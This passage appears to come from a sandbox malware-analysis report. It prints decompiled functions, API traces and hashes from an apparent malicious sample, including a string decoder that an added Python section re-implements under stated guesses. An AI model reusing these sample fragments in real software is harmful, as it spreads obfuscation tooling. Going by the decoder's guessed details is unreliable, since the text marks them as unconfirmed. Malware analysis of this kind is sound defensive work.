                                                                                                                                                                        				char _v3091;
                                                                                                                                                                        				char _v3092;
                                                                                                                                                                        				char* _v3096;
                                                                                                                                                                        				char _v3100;
                                                                                                                                                                        				short* _v3104;
                                                                                                                                                                        				int _v3108;
                                                                                                                                                                        				char _v3112;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* _t49;
                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                        				short* _t76;
                                                                                                                                                                        				void* _t83;
                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                        				void* _t90;
                                                                                                                                                                        
                                                                                                                                                                        				_t83 = __eax;
                                                                                                                                                                        				_t73 = 0;
                                                                                                                                                                        				 *_a12 = 0;
                                                                                                                                                                        				_v3112 = 0x400;
                                                                                                                                                                        				_t49 = E0040F214(__ecx, _a4, _a8,  &_v3092,  &_v3112);
                                                                                                                                                                        				_t90 = (_t87 & 0xfffffff8) - 0xc28 + 0x10;
                                                                                                                                                                        				if(_t49 == 0) {
                                                                                                                                                                        					_v2069 = 0;
                                                                                                                                                                        					_v2070 = 0;
                                                                                                                                                                        					_v2071 = 0;
                                                                                                                                                                        					_v2072 = 0;
                                                                                                                                                                        					if(_v3092 != 1) {
                                                                                                                                                                        						if(_v3092 == 2 &&  *((intOrPtr*)(_t83 + 0xa94)) != 0) {
                                                                                                                                                                        							_v3100 = _v3112 - 1;
                                                                                                                                                                        							_v3096 =  &_v3091;
                                                                                                                                                                        							if(E0040481B(_t83 + 0x890,  &_v3100, 0,  &_v3108) != 0) {
                                                                                                                                                                        								WideCharToMultiByte(0, 0, _v3104, _v3108, _a12, 0x7f, 0, 0);
                                                                                                                                                                        								LocalFree(_v3104);
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						if( *((intOrPtr*)(_t83 + 0x888)) != 0) {
                                                                                                                                                                        							if(_a16 == 0) {
                                                                                                                                                                        								E0040EFF9(_a12, _t83 + 0x87c,  &_v3090, 0x7f, 0);
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_v2060 = 0;
                                                                                                                                                                        								memset( &_v2058, 0, 0x800);
                                                                                                                                                                        								_t90 = _t90 + 0xc;
                                                                                                                                                                        								_t76 =  &_v2060;
                                                                                                                                                                        								E0040EFF9(_t76, _t83 + 0x87c,  &_v3091, 0x400, 1);
                                                                                                                                                                        								WideCharToMultiByte(0, 0, _t76, 0xffffffff, _a12, 0x7f, 0, 0);
                                                                                                                                                                        							}
                                                                                                                                                                        							_t73 = 0;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t79 = _a12;
                                                                                                                                                                        						if( *_a12 == _t73 && _v3112 >= 7 && _v3092 == 1 && _v3091 == 1) {
                                                                                                                                                                        							_t61 = _v3090 & 0x000000ff;
                                                                                                                                                                        							if(_t61 > 1 && _v3112 >= _t61 + 6) {
                                                                                                                                                                        								E00401DBC(_t79,  &_v3086, _t61);
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return 0 |  *_a12 != _t73;
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004024EB
                                                                                                                                                                        • memset.MSVCRT ref: 004024B4
                                                                                                                                                                          • Part of subcall function 0040EFF9: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040F016
                                                                                                                                                                          • Part of subcall function 0040EFF9: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040F037
                                                                                                                                                                          • Part of subcall function 0040EFF9: memcpy.MSVCRT ref: 0040F075
                                                                                                                                                                          • Part of subcall function 0040EFF9: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040F084
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025A3
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004025AD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3503910906-0
                                                                                                                                                                        • Opcode ID: 311549387020673e673ad7ade458deddd79687b60b573298398fe302b42a0f0d
                                                                                                                                                                        • Instruction ID: cfc3eb1076764f39a441947bf0103a86c194fcc0ae6958193510771120a15821
                                                                                                                                                                        • Opcode Fuzzy Hash: 311549387020673e673ad7ade458deddd79687b60b573298398fe302b42a0f0d
                                                                                                                                                                        • Instruction Fuzzy Hash: 0341A3B1408385BFDB11DE608D44AAB7BDCAB88304F044A7EF588A21C1D679DA44CB5A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 98%
                                                                                                                                                                        			E0040B4DE(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				void _v263;
                                                                                                                                                                        				char _v264;
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				signed int _t42;
                                                                                                                                                                        				signed int _t45;
                                                                                                                                                                        				intOrPtr* _t60;
                                                                                                                                                                        				signed char _t62;
                                                                                                                                                                        				intOrPtr _t63;
                                                                                                                                                                        				int _t65;
                                                                                                                                                                        
                                                                                                                                                                        				_t61 = __ecx;
                                                                                                                                                                        				_t60 = _a8;
                                                                                                                                                                        				_t63 = __ecx;
                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                        				if( *(_t60 + 4) == 0x103 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffff4) {
                                                                                                                                                                        					_t42 = E00408D0D( *((intOrPtr*)(__ecx + 0x370)), _t60);
                                                                                                                                                                        					 *((intOrPtr*)(_t63 + 0x10c)) = 1;
                                                                                                                                                                        					 *(_t63 + 0x110) = _t42;
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_a4 == 0x101 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t60 + 0xc)) == 1) {
                                                                                                                                                                        					_v264 = 0;
                                                                                                                                                                        					memset( &_v263, 0, 0xff);
                                                                                                                                                                        					E004019DA(_t61,  &_v264, 0x413438);
                                                                                                                                                                        					_t42 = E00406552( *((intOrPtr*)(_v8 + 0x108)),  &_v264);
                                                                                                                                                                        					_t63 = _v8;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t65 = 0;
                                                                                                                                                                        				if( *((intOrPtr*)(_t60 + 8)) == 0xfffffdf8) {
                                                                                                                                                                        					_t42 = SendMessageA( *(_t63 + 0x118), 0x423, 0, 0);
                                                                                                                                                                        					if( *_t60 == _t42) {
                                                                                                                                                                        						_t42 = GetMenuStringA( *(_t63 + 0x11c),  *(_t60 + 4), _t60 + 0x10, 0x4f, 0);
                                                                                                                                                                        						 *((intOrPtr*)(_t60 + 0x60)) = 0;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_a4 != 0x103) {
                                                                                                                                                                        					L27:
                                                                                                                                                                        					return _t42;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t80 =  *((intOrPtr*)(_t60 + 8)) - 0xfffffffd;
                                                                                                                                                                        					if( *((intOrPtr*)(_t60 + 8)) == 0xfffffffd) {
                                                                                                                                                                        						_t42 = E0040AFC4(_t61, _t63, _t63, _t80);
                                                                                                                                                                        						_t65 = 0;
                                                                                                                                                                        					}
                                                                                                                                                                        					if( *((intOrPtr*)(_t60 + 8)) == 0xffffff94) {
                                                                                                                                                                        						_t42 = E00408C35( *(_t60 + 0x10), _t61,  *((intOrPtr*)(_t63 + 0x370)), _t65);
                                                                                                                                                                        						_t65 = 0;
                                                                                                                                                                        					}
                                                                                                                                                                        					if( *((intOrPtr*)(_t60 + 8)) != 0xffffff9b) {
                                                                                                                                                                        						goto L27;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						if( *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x370)) + 0x1b8)) == _t65) {
                                                                                                                                                                        							_t62 = 2;
                                                                                                                                                                        							_t45 =  *(_t60 + 0x14) & _t62;
                                                                                                                                                                        							__eflags = _t45;
                                                                                                                                                                        							if(_t45 == 0) {
                                                                                                                                                                        								L20:
                                                                                                                                                                        								__eflags = _t45 - _t62;
                                                                                                                                                                        								if(_t45 == _t62) {
                                                                                                                                                                        									L23:
                                                                                                                                                                        									_t42 = 0;
                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                        									L24:
                                                                                                                                                                        									if(_t42 == _t65) {
                                                                                                                                                                        										goto L27;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t42 = _t63 + 0x25c;
                                                                                                                                                                        									if( *_t42 != _t65) {
                                                                                                                                                                        										goto L27;
                                                                                                                                                                        									}
                                                                                                                                                                        									 *_t42 = 1;
                                                                                                                                                                        									return PostMessageA( *(_t63 + 0x108), 0x402, _t65, _t65);
                                                                                                                                                                        								}
                                                                                                                                                                        								__eflags =  *(_t60 + 0x18) & _t62;
                                                                                                                                                                        								if(( *(_t60 + 0x18) & _t62) == 0) {
                                                                                                                                                                        									goto L23;
                                                                                                                                                                        								}
                                                                                                                                                                        								L22:
                                                                                                                                                                        								_t42 = 1;
                                                                                                                                                                        								goto L24;
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags =  *(_t60 + 0x18) & _t62;
                                                                                                                                                                        							if(( *(_t60 + 0x18) & _t62) == 0) {
                                                                                                                                                                        								goto L22;
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L20;
                                                                                                                                                                        						}
                                                                                                                                                                        						asm("sbb eax, eax");
                                                                                                                                                                        						_t42 =  ~( ~(( *(_t60 + 0x18) ^  *(_t60 + 0x14)) & 0x0000f002));
                                                                                                                                                                        						goto L24;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        			}

                                                                                                                                                                        Instruction addresses of the decompiled statements above, in listing order (extracted from the report's side-by-side address column; 0x00000000 marks statements without a mapped address): 0x0040b4de, 0x0040b4e8, 0x0040b4f4, 0x0040b4f6, 0x0040b4f9, 0x0040b509, 0x0040b50e, 0x0040b518, 0x0040b518, 0x0040b525, 0x0040b541, 0x0040b548, 0x0040b558, 0x0040b569, 0x0040b56e, 0x0040b571, 0x0040b574, 0x0040b57d, 0x0040b58c, 0x0040b594, 0x0040b5a6, 0x0040b5ac, 0x0040b5ac, 0x0040b594, 0x0040b5b6, 0x0040b653, 0x0040b653, 0x0040b5bc, 0x0040b5bc, 0x0040b5c0, 0x0040b5c4, 0x0040b5c9, 0x0040b5c9, 0x0040b5cf, 0x0040b5db, 0x0040b5e0, 0x0040b5e0, 0x0040b5e6, 0x00000000, 0x0040b5e8, 0x0040b5f4, 0x0040b60e, 0x0040b60f, 0x0040b60f, 0x0040b611, 0x0040b618, 0x0040b618, 0x0040b61a, 0x0040b626, 0x0040b626, 0x0040b626, 0x0040b628, 0x0040b62a, 0x00000000, 0x00000000, 0x0040b62c, 0x0040b634, 0x00000000, 0x00000000, 0x0040b643, 0x00000000, 0x0040b649, 0x0040b61c, 0x0040b61f, 0x00000000, 0x00000000, 0x0040b621, 0x0040b623, 0x00000000, 0x0040b623, 0x0040b613, 0x0040b616, 0x00000000, 0x00000000, 0x00000000, 0x0040b616, 0x0040b603
                                                                                                                                                                        0x0040b605
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b605
                                                                                                                                                                        0x0040b5e6

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040B548
                                                                                                                                                                        • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040B58C
                                                                                                                                                                        • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040B5A6
                                                                                                                                                                        • PostMessageA.USER32 ref: 0040B649
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3798638045-0
                                                                                                                                                                        • Opcode ID: d3a55612aad303442b70cf6981c395df1170026015e9bbabf54ddfea19c8819b
                                                                                                                                                                        • Instruction ID: f81f675eeec9d049c2f837a36ed854dba7505ce636643832e7163bdc5c509590
                                                                                                                                                                        • Opcode Fuzzy Hash: d3a55612aad303442b70cf6981c395df1170026015e9bbabf54ddfea19c8819b
                                                                                                                                                                        • Instruction Fuzzy Hash: F141E130600611EFCB259F24CC85AA6BBA4FF04325F1486B6E958AB2C5C378DD91CBDD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                        			E0040A283(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				signed int _t63;
                                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                        				intOrPtr _t74;
                                                                                                                                                                        				signed int _t79;
                                                                                                                                                                        				void* _t84;
                                                                                                                                                                        				signed int _t86;
                                                                                                                                                                        				char* _t98;
                                                                                                                                                                        				void* _t100;
                                                                                                                                                                        				void* _t102;
                                                                                                                                                                        				void* _t104;
                                                                                                                                                                        				void* _t106;
                                                                                                                                                                        				void* _t107;
                                                                                                                                                                        
                                                                                                                                                                        				_t84 = __eax;
                                                                                                                                                                        				E00408A97(__eax, __eflags);
                                                                                                                                                                        				_t86 = 0;
                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					_t98 = _a4;
                                                                                                                                                                        					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t86 = _t86 + 1;
                                                                                                                                                                        					if(_t86 < 1) {
                                                                                                                                                                        						continue;
                                                                                                                                                                        					}
                                                                                                                                                                        					if(strlen(_t98) >= 3) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t79 = atoi(_a4);
                                                                                                                                                                        					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
                                                                                                                                                                        						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
                                                                                                                                                                        					}
                                                                                                                                                                        					L21:
                                                                                                                                                                        					if(_a8 != 0) {
                                                                                                                                                                        						_v12 = _v12 | 0x00001000;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t63 = _v12;
                                                                                                                                                                        					 *0x41848c =  *0x41848c + 1;
                                                                                                                                                                        					 *((intOrPtr*)(0x418490 +  *0x41848c * 4)) = _t63;
                                                                                                                                                                        					return _t63;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t104 = 0;
                                                                                                                                                                        				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
                                                                                                                                                                        					L14:
                                                                                                                                                                        					_t100 = 0;
                                                                                                                                                                        					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                        					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
                                                                                                                                                                        						L20:
                                                                                                                                                                        						goto L21;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t106 = 0;
                                                                                                                                                                        					__eflags = 0;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_v20 = E00406A01(0, _a4);
                                                                                                                                                                        						_t67 = E00406A01(0, _a4);
                                                                                                                                                                        						__eflags = _v20;
                                                                                                                                                                        						if(_v20 >= 0) {
                                                                                                                                                                        							L18:
                                                                                                                                                                        							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
                                                                                                                                                                        							goto L19;
                                                                                                                                                                        						}
                                                                                                                                                                        						__eflags = _t67;
                                                                                                                                                                        						if(_t67 < 0) {
                                                                                                                                                                        							goto L19;
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L18;
                                                                                                                                                                        						L19:
                                                                                                                                                                        						_v8 = _v8 + 1;
                                                                                                                                                                        						_t100 = _t100 + 0x10;
                                                                                                                                                                        						_t106 = _t106 + 0x14;
                                                                                                                                                                        						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
                                                                                                                                                                        					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
                                                                                                                                                                        					goto L20;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t102 = 0;
                                                                                                                                                                        				__eflags = 0;
                                                                                                                                                                        				do {
                                                                                                                                                                        					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                        					_push(_t72);
                                                                                                                                                                        					L0041207E();
                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                        					_v20 = _t72;
                                                                                                                                                                        					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
                                                                                                                                                                        					_push(_t74);
                                                                                                                                                                        					L0041207E();
                                                                                                                                                                        					_t107 = _t107 + 0x10;
                                                                                                                                                                        					__eflags = _v20;
                                                                                                                                                                        					if(_v20 == 0) {
                                                                                                                                                                        						L11:
                                                                                                                                                                        						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
                                                                                                                                                                        						_v16 = 1;
                                                                                                                                                                        						goto L12;
                                                                                                                                                                        					}
                                                                                                                                                                        					__eflags = _t74;
                                                                                                                                                                        					if(_t74 != 0) {
                                                                                                                                                                        						goto L12;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L11;
                                                                                                                                                                        					L12:
                                                                                                                                                                        					_v8 = _v8 + 1;
                                                                                                                                                                        					_t102 = _t102 + 0x10;
                                                                                                                                                                        					_t104 = _t104 + 0x14;
                                                                                                                                                                        					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
                                                                                                                                                                        				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
                                                                                                                                                                        				__eflags = _v16;
                                                                                                                                                                        				if(_v16 != 0) {
                                                                                                                                                                        					goto L20;
                                                                                                                                                                        				}
                                                                                                                                                                        				goto L14;
                                                                                                                                                                        			}






















                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00408A97: ??2@YAPAXI@Z.MSVCRT ref: 00408AB8
                                                                                                                                                                          • Part of subcall function 00408A97: ??3@YAXPAX@Z.MSVCRT ref: 00408B7F
                                                                                                                                                                        • strlen.MSVCRT ref: 0040A2A9
                                                                                                                                                                        • atoi.MSVCRT ref: 0040A2B7
                                                                                                                                                                        • _mbsicmp.MSVCRT ref: 0040A30A
                                                                                                                                                                        • _mbsicmp.MSVCRT ref: 0040A31D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4107816708-0
                                                                                                                                                                        • Opcode ID: fcbe6108af864edb97e3be4016439bdb3d8805d59c5b364e212079bc31d54683
                                                                                                                                                                        • Instruction ID: a4071902e71568577f89ec7532499d814672e4af5b69a40392892895b6c6556c
                                                                                                                                                                        • Opcode Fuzzy Hash: fcbe6108af864edb97e3be4016439bdb3d8805d59c5b364e212079bc31d54683
                                                                                                                                                                        • Instruction Fuzzy Hash: 2F414C35900304ABCB11DFA9C580A9ABBF4FB48308F1085BEEC45EB382D775DA51CB59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%
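The decompiled function E00411533 in the C-Code block that follows is a base64-style decoder: it reads its input four characters at a time, maps each character to a 6-bit value through E004114FF, treats '.' directly as the value 0x3e (62), and packs the sextets into output bytes with the shifts visible in the listing (`_v5 >> 4 | _v6 << 2`, then `_t57 >> 2 | _v5 << 4`). A '-' (0x2d) in the third or fourth slot of a group ends the string early with one or two bytes. The Python below is an added re-implementation for decoding such strings offline; it is not code from the sample or from the Joe Sandbox report. Assumptions, also marked in the code: E004114FF itself is not shown, so letters and digits are assumed to map as in RFC 4648 base64 (only the '.' = 62 case is visible); the character carrying the value 63 is unknown and '/' is a placeholder; the third output byte and the loop bound are cut off in the listing, so standard packing over whole 4-character groups is assumed. The encoder is derived from the decoder and is included only to build test vectors.

```python
# Added example: re-implementation of the decode loop of E00411533 as it appears in the
# Joe Sandbox listing. Not recovered from the binary; every ASSUMPTION is marked below.

TERMINATOR = "-"  # 0x2d in the 3rd/4th slot of a group ends the string (visible in the listing)

# Index = 6-bit value. '.' = 62 is the only mapping visible in the listing (E004114FF is not
# shown). ASSUMPTION: A-Z, a-z, 0-9 map to 0..61 as in RFC 4648; '/' for 63 is a placeholder.
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789./"


def sextet(ch: str) -> int:
    """Map one input character to its 6-bit value (stands in for E004114FF)."""
    idx = ALPHABET.find(ch)
    if idx < 0:
        raise ValueError(f"character {ch!r} is outside the assumed alphabet")
    return idx


def decode_group(group: str) -> bytes:
    """Decode one 4-character group into 1..3 bytes, mirroring the listing's shifts.

    For a group c0 c1 c2 c3 with values v6 v5 t57 v7 the listing computes:
        out[0] = v5 >> 4 | v6 << 2
        out[1] = t57 >> 2 | v5 << 4      (not emitted when c2 == '-')
    The third byte is cut off in the report. ASSUMPTION: standard packing,
        out[2] = v7 | t57 << 6           (not emitted when c3 == '-')
    """
    c0, c1, c2, c3 = group
    v6, v5 = sextet(c0), sextet(c1)
    out = bytearray()
    out.append(((v5 >> 4) | (v6 << 2)) & 0xFF)
    if c2 == TERMINATOR:
        return bytes(out)
    t57 = sextet(c2)
    out.append(((t57 >> 2) | (v5 << 4)) & 0xFF)
    if c3 == TERMINATOR:
        return bytes(out)
    v7 = sextet(c3)
    out.append((v7 | (t57 << 6)) & 0xFF)  # ASSUMED third byte
    return bytes(out)


def decode(s: str) -> bytes:
    """Decode a whole string; returns b'' when no full 4-character group is present.

    The listing returns an empty result when strlen(s) - 3 < 0. Its loop bound is cut
    off, so this ASSUMES whole 4-character groups only (a trailing partial group is ignored).
    """
    out = bytearray()
    for i in range(0, len(s) - 3, 4):
        chunk = decode_group(s[i:i + 4])
        out += chunk
        if len(chunk) < 3:  # a '-' terminator ended the string
            break
    return bytes(out)


def encode(data: bytes) -> str:
    """Inverse of decode(), ASSUMED from the decoder: a full 3-byte block gives 4 chars,
    a 1-byte tail gives 2 chars followed by '--', a 2-byte tail gives 3 chars followed by '-'."""
    out = []
    for i in range(0, len(data), 3):
        block = data[i:i + 3]
        b0 = block[0]
        b1 = block[1] if len(block) > 1 else 0
        b2 = block[2] if len(block) > 2 else 0
        out.append(ALPHABET[b0 >> 2])
        out.append(ALPHABET[((b0 & 0x3) << 4) | (b1 >> 4)])
        if len(block) == 1:
            out.append("--")
            break
        out.append(ALPHABET[((b1 & 0xF) << 2) | (b2 >> 6)])
        if len(block) == 2:
            out.append("-")
            break
        out.append(ALPHABET[b2 & 0x3F])
    return "".join(out)


if __name__ == "__main__":
    # Constructed inputs, not strings taken from the sample.
    for sample in ("TWFu", "TWE-", "TQ--", ".A.A"):
        print(sample, "->", decode(sample))
```

Strings that decode to readable text under the standard letter/digit mapping confirm the assumption about E004114FF; if they come out as garbage, the sample's alphabet differs and `ALPHABET` is the only line that needs changing.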

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00411533(char* __eax, void* __edi) {
                                                                                                                                                                        				unsigned int _v5;
                                                                                                                                                                        				signed int _v6;
                                                                                                                                                                        				signed int _v7;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                        				intOrPtr _t37;
                                                                                                                                                                        				char* _t56;
                                                                                                                                                                        				signed char _t57;
                                                                                                                                                                        				char* _t67;
                                                                                                                                                                        				void* _t68;
                                                                                                                                                                        				void* _t69;
                                                                                                                                                                        
                                                                                                                                                                        				_t68 = __edi;
                                                                                                                                                                        				_t56 = __eax;
                                                                                                                                                                        				_t69 = 0;
                                                                                                                                                                        				_t37 = strlen(__eax) + 0xfffffffd;
                                                                                                                                                                        				_v16 = _t37;
                                                                                                                                                                        				if(_t37 < 0) {
                                                                                                                                                                        					L18:
                                                                                                                                                                        					 *((char*)(_t69 + _t68)) = 0;
                                                                                                                                                                        					return _t69;
                                                                                                                                                                        				}
                                                                                                                                                                        				_v12 = 0xfffffffe;
                                                                                                                                                                        				_v12 = _v12 - _t56;
                                                                                                                                                                        				_t5 = _t56 + 2; // 0x4116ad
                                                                                                                                                                        				_t67 = _t5;
                                                                                                                                                                        				/* each iteration takes 4 input characters (6 bits each) and emits up to 3 bytes; '.' maps to 0x3e, '-' ends the string */
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					_t6 = _t67 - 2; // 0x75fff88b
                                                                                                                                                                        					_t39 =  *_t6;
                                                                                                                                                                        					if( *_t6 != 0x2e) {
                                                                                                                                                                        						_v6 = E004114FF(_t39);
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_v6 = 0x3e;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t9 = _t67 - 1; // 0xfc75fff8
                                                                                                                                                                        					_t41 =  *_t9;
                                                                                                                                                                        					if( *_t9 != 0x2e) {
                                                                                                                                                                        						_v5 = E004114FF(_t41);
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_v5 = 0x3e;
					}
					_t43 =  *_t67;
					if( *_t67 != 0x2e) {                               // third symbol of the group: anything but '.' (0x2e) goes through the lookup routine
						_t57 = E004114FF(_t43);
					} else {
						_t57 = 0x3e;                                   // '.' maps directly to 62 (0x3e)
					}
					_t45 =  *((intOrPtr*)(_t67 + 1));
					if( *((intOrPtr*)(_t67 + 1)) != 0x2e) {            // fourth symbol, same rule
						_v7 = E004114FF(_t45);
					} else {
						_v7 = 0x3e;
					}
					 *(_t68 + _t69) = _v5 >> 0x00000004 | _v6 << 0x00000002;   // out[i] = sym0 << 2 | sym1 >> 4 (_v6/_v5 are mapped above this excerpt)
					if( *_t67 == 0x2d) {                               // '-' (0x2d) as third symbol: group yields one byte, finish below
						break;
					}
					 *(_t69 + _t68 + 1) = _t57 >> 0x00000002 | _v5 << 0x00000004;   // out[i+1] = sym1 << 4 | sym2 >> 2
					if( *((char*)(_t67 + 1)) == 0x2d) {                // '-' as fourth symbol: two bytes, NUL-terminate, return length
						 *((char*)(_t69 + _t68 + 2)) = 0;
						_t34 = _t69 + 2; // 0x2
						return _t34;
					}
					_t69 = _t69 + 3;                                   // three output bytes per full group
					 *(_t69 + _t68 - 1) = _t57 << 0x00000006 | _v7;    // out[i+2] = sym2 << 6 | sym3
					_t25 = _t69 + 5; // 0x2
					_t67 = _t67 + 4;                                   // advance to the next group of four symbols
					if(_t25 >= 0x3ff || _v12 + _t67 > _v16) {          // output buffer nearly full (0x3ff) or input consumed
						goto L18;
					} else {
						continue;
					}
				}
				 *(_t69 + _t68 + 1) = 0;                               // reached via the break above: NUL-terminate
				_t31 = _t69 + 1; // 0x1
				return _t31;                                           // number of bytes written
			}

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strlen
